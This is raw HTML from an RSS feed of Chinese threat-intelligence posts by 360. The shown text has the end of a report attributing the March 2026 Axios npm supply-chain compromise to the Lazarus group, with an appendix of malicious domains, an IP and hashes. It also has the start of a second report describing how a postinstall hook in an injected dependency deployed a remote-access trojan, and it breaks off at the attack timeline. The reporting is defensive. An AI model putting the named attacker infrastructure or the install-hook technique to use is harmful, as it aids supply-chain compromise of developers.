SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">在我们持续监控Lazarus组织的活动中，该组织发起了一项攻击活动，在该活动中，受害者被从消息平台例如Telegram引诱到会议相关诱饵中，例如Zoom会议，随后下发及诱导执行PowerShell相关脚本从而可以多平台上执行实时命令和窃取凭据。Daylight也披露过同类活动，将其跟踪为GhostCall活动。</span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;text-align: justify;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">在之前攻击活动中，攻击者使用的样本(</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">ea3192f64b9988889d5f8c61be637d2a</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">)名为“c:\programdata\system.bat”,从恶意域名microsmeet[.]xyz和bluyy[.]com下发载荷。经过分析比对axios入侵事件们发现:</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">样本的命名与命令行基本一致;</span></span></p></li><li><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">建立的注册表项 Run 项均是MicrosoftUpdate;</span></span></p></li><li><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">与Daylight报告披露的Lazarus组织的基础设施一致。</span></span></p></li></ul><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.06944444444444445" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100024600" src="https://wechat2rss.xlab.app/img-proxy/?k=1e529301&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLlQYrp6ibZ3OVAqz1h5ibQVJo3FJpcZzPeRoDXQW4nTMx8Ly1kvyl26bGmcxZorw6xQRm0OJ4ohF0MyaAyr8GEjkAdGtxdbF8vo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;color: rgb(136, 136, 136);font-style: italic;">图1 089e2872016f75a5223b5e02c184dfec与ea3192f64b9988889d5f8c61be637d2a样本命令行一致</span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">因此我们以强烈的信心将axios入侵事件与我们持续跟踪的Lazarus组织活动(也称为GhostCall活动)关联起来。</span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">其次，在2023年4月21日的报告中，Jamf Threat Lab披露了名为“RustBucket”的 macOS 恶意软件变种。该报告披露第三阶段载荷(182760cbe11fa0316abfb8b7b00b63f83159f5aa)包含webT模块。</span></span></p><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.40641711229946526" data-w="561" style="width: 553.74px;height: 225.07px;" src="https://wechat2rss.xlab.app/img-proxy/?k=8a54b506&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIZ2RE5pUNOesXUUJYl0zibtvhfXdOaENEoSGdYpicLDtLyu2pNu1EQ4zZGL8Icv5Tiax3HCPXVKibCe0aDYNg3Nzj0qSSZwQmdu74%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;color: rgb(136, 136, 136);font-style: italic;">图2 RustBucket样本模块信息</span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">在分析axios入侵事件，我们提取了macOS平台样本的构建信息，可以看出项目名称为macWebT，与上文webT字符串同类。 </span></span></p><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">/Users/mac/Desktop/Jain_DEV/client_mac/macWebT/macWebT/</span></span></p></li><li><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">/Users/mac/Library/Developer/Xcode/DerivedData/macWebT-hlbytmqtodqtmmfrlgcunsjzzmop/Build/Intermediates.noindex/macWebT.build/Release/macWebT.build/Objects-normal/arm64/main.o (raw binary string)</span></span><o:page></o:page></p></li><li><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">/Users/mac/Library/Developer/Xcode/DerivedData/macWebT-hlbytmqtodqtmmfrlgcunsjzzmop/Build/Intermediates.noindex/macWebT.build/Release/macWebT.build/Objects-normal/x86_64/main.o (raw binary string)</span></span></p></li></ol><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">因此，我们认为此次axios入侵事件是Lazarus组织所为。</span></span></p><h1 style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 18px;color: rgb(190, 25, 31);font-weight: bold;"> 三、</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 18px;color: rgb(190, 25, 31);font-weight: bold;">处置建议 </span></span></h1><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 17px;">参照此前报告：《</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508054&amp;idx=1&amp;sn=53087fd771552eb8c5c0144dc7db8400&amp;scene=21#wechat_redirect" textvalue="Axios npm供应链攻击威胁分析报告" data-itemshowtype="0" linktype="text" data-linktype="2">Axios npm供应链攻击威胁分析报告</a>》</span></p><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-role="title" data-tools="135编辑器" data-id="85638" style=""><div style="margin: 2em auto 0px;padding: 0.5em 0px;white-space: normal;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid rgb(204, 204, 204);display: block;font-size: 15px;font-style: normal;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);box-sizing: border-box;font-family:inherit;"><p style="margin-top: -1.2em;text-align: center;padding: 0px;border: none;line-height: 1.4;box-sizing: border-box;"><span style="font-size:15px;"><strong><span style="background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);font-style: normal;padding: 8px 23px;text-align: center;text-decoration: inherit;font-family:inherit;"><span leaf="">附录 IOCs</span></span></strong></span></p></div></div></div><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">kenaikoda[.]com</span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">teams.onlivecall[.]com</span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">23.254.204[.]101:80</span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">3f47643c7a5cbf132f46b4cba75d1aa3</span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">db07741e586bfae526730c592a2ffe6a</span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">ea3192f64b9988889d5f8c61be637d2a</span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">41372946fe231c73750428700f6015fb</span></span></p><div data-role="outer" label="Powered by 135editor.com" style="" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="96036"><div style="margin:10px auto;"><div data-autoskip="1" style="font-size: 14px;text-align: justify;letter-spacing: 1.5px;line-height: 1.75em;color: #3e3e3e;"><p hm_fix="208:559"><span style="color: rgb(190, 25, 31);font-size: 15px;"><strong style="letter-spacing: 0.544px;caret-color: red;max-width: 100%;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="max-width: 100%;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span leaf="">360</span></span></strong><strong style="letter-spacing: 0.544px;caret-color: red;max-width: 100%;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="max-width: 100%;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="margin: 0px;padding: 0px;text-align: justify;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="margin: 0px;padding: 0px;max-width: 100%;color: rgb(136, 136, 136);font-size: 15px;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span leaf="">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div><o:page></o:page></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=671973db&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247508249%26idx%3D1%26sn%3Dd50892ac7b48a52ff293889bb77c800f">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 01 Apr 2026 20:16:00 +0800</pubDate>
    </item>
    <item>
      <title>Axios npm供应链攻击威胁分析报告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508054&amp;idx=1&amp;sn=53087fd771552eb8c5c0144dc7db8400</link>
      <description>本次攻击采用“幽灵依赖 + 诱饵版本 + 自清理”策略，能够在不触发常规源码差异检查的情况下完成投毒，并在短时间内完成发布、感染与下线</description>
      <content:encoded><![CDATA[<p><span>360威胁情报中心</span> <span>2026-03-31 19:21</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=7de4ce0a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FEmmib7pWXrXKoyIvgDwOMbZNL5Z5k3frLbOY8swdibicqiboCMaoia8kEBAuWvkBwbMLa7LmB7tqcJLGFDJxRJOJQejY1zObFjzFRPlLzGKqwaL0%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本次攻击采用“幽灵依赖 + 诱饵版本 + 自清理”策略，能够在不触发常规源码差异检查的情况下完成投毒，并在短时间内完成发布、感染与下线</p>
  <div style="padding: 0 8px;" data-mpa-md-root="t" data-mpa-uuid="f79eb1b31d4174e868d9e7f35ac7d904" data-mpa-apply-md="t"><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsudmx"><span style="" mpa-font-style="mneec5rg17to"><span style="font-variant: normal;text-transform: none;"><div style="width: 100%;background: rgba(190, 116, 146, 0.08);padding: 14px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;line-height: 24px;" data-mid="" mpa-from-tpl="t"><div yb-mpa-mark="mark-intro" style="width: 100%;margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;text-indent: 2em;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mnef4dh1vye" data-pm-slice="0 0 []"><span leaf="" mpa-is-content="t" mpa-font-style="mnef4dgtcfh" style="">2026年3月31日，npm生态中广泛使用的JavaScript HTTP客户端库Axios遭受供应链攻击。攻击者通过劫持合法维护者账号jasonsaayman，在未修改任何仓库源代码的情况下，仅在package.json中注入了恶意二次依赖 plain-crypto-js@4.2.1实施攻击。该依赖的 postinstall 生命周期钩子会在安装阶段自动执行，下载并部署跨平台远控木马（RAT），覆盖macOS/Windows/Linux。</span><p style="width: 100%;margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;text-indent: 2em;"><span leaf="" mpa-is-content="t" mpa-font-style="mnef4dgt10jz" style="">本次攻击采用“幽灵依赖 + 诱饵版本 + 自清理”策略，能够在不触发常规源码差异检查的情况下完成投毒，并在短时间内完成发布、感染与下线。恶意版本axios@1.14.1与axios@0.30.4的存活时间均不足3小时，已被npm官方紧急下架。</span></p></div></div></div></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: center;" data-mpa-md-action-id="mneialsucl8"><span mpa-font-style="mneec5rg16du" style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span data-mpa-action-id="mneiipxv1v4z" data-pm-slice="0 0 []"><span style="background-color: rgb(190, 25, 31);" mpa-font-style="mneh2b4m1yn0"><span mpa-font-style="mnehy8ko1jgm" style=""><span style="background-color: rgb(190, 25, 31);" mpa-font-style="mnei12fh6up"><span leaf="" mpa-font-style="mneiipxev92" style="font-size: 18px;"><span textstyle="" style="background-color: rgb(190, 25, 31);color: rgb(255, 255, 255);">*</span></span></span></span></span><span style="background-color: rgb(190, 25, 31);font-size: 18px;" leaf="" mpa-font-style="mneiipxe1s2x"><span textstyle="" style="background-color: rgb(190, 25, 31);color: rgb(255, 255, 255);">风险提醒</span></span><span style="background-color: rgb(190, 25, 31);" mpa-font-style="mneh2b4maxv"><span mpa-font-style="mnehy8koj2t" style=""><span style="background-color: rgb(190, 25, 31);" mpa-font-style="mnei12fh1w0v"><span leaf="" mpa-font-style="mneiipxe1wih" style="font-size: 18px;"><span textstyle="" style="background-color: rgb(190, 25, 31);color: rgb(255, 255, 255);">*</span></span></span></span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialsuk00"><span mpa-font-style="mneec5rg16du" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">任何在<span textstyle="" style="font-weight: bold;">2026年3月31日北京时间</span></span></span></span><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf=""><span textstyle="" style="font-weight: bold;">08:21</span></span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="font-weight: bold;">之后执行npm install的环境，若依赖范围为1.14.0或0.30.0</span>，均可能已遭感染。建议立即执行</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">版本锁定、环境审计、IOC 扫描与凭证轮换</span></span></span><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">。</span></span></span></span></p><div data-mpa-md-key="heading-1" style="margin-bottom: 16px;margin-top: 16px;"><div style="width: 100%;display: flex;justify-content: center;align-items: center;justify-content: flex-start;" data-mid=""><div style="text-align: left;" data-mid=""><p data-mpa-md-content="t" style="font-size: 18px;color: rgb(51, 51, 51);font-weight: bold;letter-spacing: 1px;text-align: left;" data-mid="" data-mpa-md-action-id="mneialsuf38"><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf="">一、事件背景</span></span></span></p></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneiae29jp1"><span leaf="">Axios是npm生态中下载量最高的包之一，周下载量超过1亿次，直接或间接依赖项目超过17.4万个。攻击者通过npm发布凭证劫持实现投毒，未对GitHub仓库源码进行任何改动，仅利用postinstall生命周期钩子完成后门植入。</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialsu1xrc"><span style="" mpa-font-style="mneec5rg1h14"><span style="font-variant: normal;text-transform: none;"><span leaf="">该攻击手法与近年来多起npm供应链事件高度一致：</span></span></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mneec5rgymu" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">基础组件维护者账号安全（MFA/Token 管控）的关键性；</span></span></span></span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mneec5rg55f" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">安装脚本（preinstall/install/postinstall）在默认执行策略下的固有风险；</span></span></span></span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span mpa-font-style="mneec5rg1lj4" style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">仅依赖“源码审计/差异对比”的安全策略存在盲区。</span></span></span></span></p></li></ul><div data-mpa-md-key="heading-1" style="margin-bottom: 16px;margin-top: 16px;"><div style="width: 100%;display: flex;justify-content: center;align-items: center;justify-content: flex-start;" data-mid=""><div style="text-align: left;" data-mid=""><p data-mpa-md-content="t" style="font-size: 18px;color: rgb(51, 51, 51);font-weight: bold;letter-spacing: 1px;text-align: left;" data-mid="" data-mpa-md-action-id="mneialsven3"><span leaf="">二、详细攻击时间线</span></p></div></div></div><ol style="list-style-type: decimal;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="ordered-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" 